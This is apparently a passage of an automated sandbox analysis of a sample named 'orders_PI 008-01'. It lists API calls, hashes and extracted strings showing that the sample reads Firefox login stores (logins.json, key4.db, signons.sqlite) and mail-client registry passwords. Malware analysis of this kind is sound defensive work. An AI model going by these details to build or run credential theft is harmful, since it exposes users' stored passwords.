                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                        • memset.MSVCRT ref: 0040E6B5
                                        • memset.MSVCRT ref: 0040E6CC
                                          • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                          • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                        • memset.MSVCRT ref: 0040E736
                                        • memset.MSVCRT ref: 0040E74F
                                        • sprintf.MSVCRT ref: 0040E76D
                                        • sprintf.MSVCRT ref: 0040E788
                                        • _strcmpi.MSVCRT ref: 0040E79E
                                        • _strcmpi.MSVCRT ref: 0040E7B7
                                        • _strcmpi.MSVCRT ref: 0040E7D3
                                        • memset.MSVCRT ref: 0040E858
                                        • sprintf.MSVCRT ref: 0040E873
                                        • _strcmpi.MSVCRT ref: 0040E889
                                        • _strcmpi.MSVCRT ref: 0040E8A5
                                        Similarity
                                        • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                        • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                        • API String ID: 4171719235-3943159138
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                        • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                        • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                        • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                        • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                        • GetWindowRect.USER32(?,?), ref: 00410487
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                        • GetDC.USER32 ref: 004104E2
                                        • strlen.MSVCRT ref: 00410522
                                        • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                        • ReleaseDC.USER32(?,?), ref: 00410580
                                        • sprintf.MSVCRT ref: 00410640
                                        • SetWindowTextA.USER32(?,?), ref: 00410654
                                        • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                        • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                        • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                        • GetClientRect.USER32(?,?), ref: 004106DD
                                        • GetWindowRect.USER32(?,?), ref: 004106E7
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                        • GetClientRect.USER32(?,?), ref: 00410737
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                        • String ID: %s:$EDIT$STATIC
                                        • API String ID: 1703216249-3046471546
                                        • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                        • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                        • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                        • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                        APIs
                                        • memset.MSVCRT ref: 004024F5
                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                        • _mbscpy.MSVCRT(?,00000000,?,?,?,7568EB20,?,00000000), ref: 00402533
                                        • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$QueryValuememset
                                        • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                        • API String ID: 168965057-606283353
                                        • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                        • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                        • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                        • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                        APIs
                                        • memset.MSVCRT ref: 00402869
                                          • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                        • _mbscpy.MSVCRT(?,?,7568EB20,?,00000000), ref: 004028A3
                                          • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7568EB20,?,00000000), ref: 0040297B
                                          • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                        • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                        • API String ID: 1497257669-167382505
                                        • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                        • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                        • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                        • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                        APIs
                                        • EndDialog.USER32(?,?), ref: 0040FC88
                                        • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                        • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                        • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                        • memset.MSVCRT ref: 0040FCFD
                                        • memset.MSVCRT ref: 0040FD1D
                                        • memset.MSVCRT ref: 0040FD3B
                                        • memset.MSVCRT ref: 0040FD54
                                        • memset.MSVCRT ref: 0040FD72
                                        • memset.MSVCRT ref: 0040FD8B
                                        • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                        • memset.MSVCRT ref: 0040FE45
                                        • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                        • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                        • sprintf.MSVCRT ref: 0040FF0F
                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                        • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                        • SetFocus.USER32(00000000), ref: 0040FF39
                                        Strings
                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                        • {Unknown}, xrefs: 0040FD02
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                        • API String ID: 1428123949-3474136107
                                        • Opcode ID: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                        • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                        • Opcode Fuzzy Hash: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                        • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                        APIs
                                        • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                        • LoadCursorA.USER32(00000067), ref: 0040115F
                                        • SetCursor.USER32(00000000,?,?), ref: 00401166
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                        • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                        • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                        • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                        • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                        • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                        • EndDialog.USER32(?,00000001), ref: 0040121A
                                        • DeleteObject.GDI32(?), ref: 00401226
                                        • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                        • ShowWindow.USER32(00000000), ref: 00401253
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                        • ShowWindow.USER32(00000000), ref: 00401262
                                        • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                        • memset.MSVCRT ref: 0040128E
                                        • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                        • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                        • String ID:
                                        • API String ID: 2998058495-0
                                        • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                        • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                        • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                        • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                        APIs
                                          • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                          • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                        • SetMenu.USER32(?,00000000), ref: 0040BD23
                                        • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                        • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                        • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                        • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                        • _strcmpi.MSVCRT ref: 0040BE93
                                        • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                        • SetFocus.USER32(?,00000000), ref: 0040BECE
                                        • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                        • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                        • strlen.MSVCRT ref: 0040BEFE
                                        • strlen.MSVCRT ref: 0040BF0C
                                        • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                          • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                          • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                        • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                        • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                        • memset.MSVCRT ref: 0040BFDB
                                        • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                        • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                        • API String ID: 2303586283-933021314
                                        • Opcode ID: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                        • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                        • Opcode Fuzzy Hash: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                        • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                        APIs
                                        • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                        • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                        • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                        • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                        • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                        • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmp$memcpy
                                        • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                        • API String ID: 231171946-2189169393
                                        • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                        • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                        • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                        • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscat$memsetsprintf$_mbscpy
                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                        • API String ID: 633282248-1996832678
                                        • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                        • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                        • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                        • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                        APIs
                                        • memset.MSVCRT ref: 00406782
                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                        • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                        • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                        • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                        • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                        • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                        • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                        • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                        • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                        • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                        • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                        • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                        • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                        • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                        • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                        Strings
                                        • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                        • , xrefs: 00406834
                                        • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                        • key4.db, xrefs: 00406756
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memcmp$memsetstrlen
                                        • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                        • API String ID: 3614188050-3983245814
                                        • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                        • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                        • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                        • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                        APIs
                                        • memset.MSVCRT ref: 0040A973
                                        • memset.MSVCRT ref: 0040A996
                                        • memset.MSVCRT ref: 0040A9AC
                                        • memset.MSVCRT ref: 0040A9BC
                                        • sprintf.MSVCRT ref: 0040A9F0
                                        • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                        • sprintf.MSVCRT ref: 0040AABE
                                        • _mbscat.MSVCRT ref: 0040AAED
                                          • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                        • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                        • sprintf.MSVCRT ref: 0040AB21
                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`Wu,00000000,?,?,0040A7BE,00000001,0044CBC0,75570A60), ref: 00406D4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                        • API String ID: 710961058-601624466
                                        • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                        • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                        • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                        • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: sprintf$memset$_mbscpy
                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                        • API String ID: 3402215030-3842416460
                                        • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                        • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                        • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                        • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                        APIs
                                          • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                          • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                          • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                          • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                          • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                          • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                          • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                          • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                        • strlen.MSVCRT ref: 0040F139
                                        • strlen.MSVCRT ref: 0040F147
                                        • memset.MSVCRT ref: 0040F187
                                        • strlen.MSVCRT ref: 0040F196
                                        • strlen.MSVCRT ref: 0040F1A4
                                        • memset.MSVCRT ref: 0040F1EA
                                        • strlen.MSVCRT ref: 0040F1F9
                                        • strlen.MSVCRT ref: 0040F207
                                        • _strcmpi.MSVCRT ref: 0040F2B2
                                        • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                        • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                        • String ID: logins.json$none$signons.sqlite$signons.txt
                                        • API String ID: 2003275452-3138536805
                                        • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                        • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                        • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                        • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                        APIs
                                        • memset.MSVCRT ref: 0040C3F7
                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                        • strrchr.MSVCRT ref: 0040C417
                                        • _mbscat.MSVCRT ref: 0040C431
                                        • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
